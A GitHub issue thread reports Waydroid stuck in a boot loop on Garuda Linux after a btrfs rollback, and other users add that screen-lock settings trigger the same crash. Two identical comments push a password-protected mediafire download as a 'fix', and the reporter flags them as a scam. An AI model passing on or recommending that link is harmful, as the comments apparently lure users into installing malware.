### ISSUE TITLE
[BUG] Waydroid either keep on restarting from after intial boot screen or stucks on infinity ineage initial booting screen

### ISSUE THREAD

**Issue by rairay91** [waydroid/waydroid#1537]
### Describe the bug

I just rollback to previous btrfs snapshot and waydroid no longer works, instead does what i mentioned above in title.
I even switch back to original btrfs state, but still waydroid not working.

### Waydroid version

1.4.3

### Device

Linux Desktop

### Operating System

Garuda Linux x86_64

### Kernel version

6.10.6-zen1-1-zen

### Desktop Environment

KDE Plasma 6.1.4

### GPU

Intel Haswell-ULT Integrated Graphics Controller @ 1.10 GHz [Integrated]

### Logs

/var/lib/waydroid/waydroid.cfg
[waydroid.cfg.txt](https://github.com/user-attachments/files/16758259/waydroid.cfg.txt)

/var/lib/waydroid/waydroid.prop
[waydroid.prop.txt](https://github.com/user-attachments/files/16758260/waydroid.prop.txt)

/var/lib/waydroid/waydroid_base.prop
[waydroid_base.prop.txt](https://github.com/user-attachments/files/16758261/waydroid_base.prop.txt)

/var/lib/waydroid/waydroid.log
[waydroid.log.txt](https://github.com/user-attachments/files/16758263/waydroid.log.txt)

`sudo waydroid shell -- logcat -d | tee logcat.txt`
[logcat.txt](https://github.com/user-attachments/files/16758280/logcat.txt)

`sudo dmesg | tee dmesg.txt`
[dmesg.txt](https://github.com/user-attachments/files/16758291/dmesg.txt)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rairay91** [comment]
@NikhilKumar77777 or @NikilaScammer do not even try to post that like with that line anymore. Or i will report and your account will be suspended.

**Comment by FlorianPaintner** [comment]
I experience the same behaviour when adding a screen unlock method (no matter if PIN or pattern; hide or show system notifications).
Device: Redmi note 9 pro
OS: UbuntuTouch 20.04 (OTA-9)
Lineage OS Version: 20-20250719-VANILLA-waydroid_arm64

**Comment by linuxtopia** [comment]
yeah if you use screen lock then waydroid goes crash and reboot then internet also is being broken.
